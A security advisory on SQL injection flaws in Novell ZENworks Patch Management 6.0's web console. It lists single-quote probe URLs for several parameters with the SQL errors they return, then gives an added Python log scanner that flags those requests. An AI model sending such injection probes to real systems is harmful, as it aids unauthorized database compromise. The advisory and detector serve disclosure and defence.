
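Novell ZENworks Patch Management SQL Injection Vulnerabilities
2007-02-06

Affected systems:

Novell ZENworks Patch Management 6.0.0.52

Unaffected systems:

Novell ZENworks Patch Management 6.2

Description:

BUGTRAQ ID: 15220

Novell's ZENworks components allow organizations to manage Windows workstations from the SuSE Linux platform; Patch Management is the component used to manage patches. The management console of ZENworks Patch Management contains multiple SQL injection vulnerabilities that allow a remote attacker to fully compromise the underlying database system. Exploitation requires that the administrator has manually created at least one non-privileged user account.

Test method: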

http://192.168.1.10/computers/default.asp?sort=&Direction=';
Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, 
@Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save
&Page=rep
Response from server: Incorrect syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=
save&Page=rep
Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter
=save&Page=rep
Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.
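
To check web server logs for requests like the ones above, the following added example (not part of the original advisory) flags requests to the two console pages where one of the parameters shown in the tests carries a single quote. The log field order, timestamps and client addresses are constructed for illustration; adjust FIELDS to the server's actual #Fields line.

```python
from urllib.parse import parse_qsl

# Pages and parameter names taken from the test requests in this advisory.
WATCHED = {
    "/computers/default.asp": {"direction"},
    "/reports/default.asp": {"searchtext", "statusfilter", "computerfilter"},
}

# Assumed field order of a W3C extended log (constructed for this example).
FIELDS = ("date", "time", "c_ip", "method", "stem", "query", "status")

# Constructed sample log lines; not taken from a real system.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-01-01 10:01:02 192.168.1.50 GET /computers/default.asp sort=&Direction=%27; 500
2000-01-01 10:01:09 192.168.1.50 GET /reports/default.asp sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep 500
2000-01-01 10:03:00 192.168.1.77 GET /reports/default.asp sort=[ReportImpact_Name]&Dir=asc&SearchText=server01&StatusFilter=ERRR&computerFilter=187&impactFilter=29&Page=rep 200
2000-01-01 10:04:00 192.168.1.77 GET /help/default.asp topic=what's+new 200
"""

def suspicious_params(stem, query):
    """Return watched parameter names whose URL-decoded value contains a quote."""
    watched = WATCHED.get(stem.lower())
    if not watched:
        return []  # page is not one of the two named in the advisory
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if name.lower() in watched and "'" in value]

def scan(lines):
    """Return (client_ip, page, parameter_names, http_status) for each flagged request."""
    findings = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # skip W3C header directives and blank lines
        rec = dict(zip(FIELDS, line.split()))
        if len(rec) < len(FIELDS):
            continue  # malformed or truncated record
        hits = suspicious_params(rec["stem"], rec["query"])
        if hits:
            findings.append((rec["c_ip"], rec["stem"], hits, rec["status"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A quote in SearchText can also come from a legitimate search term, so the logged HTTP status is returned with each finding to help triage.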

Recommendation:

Vendor patch:

Novell

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:

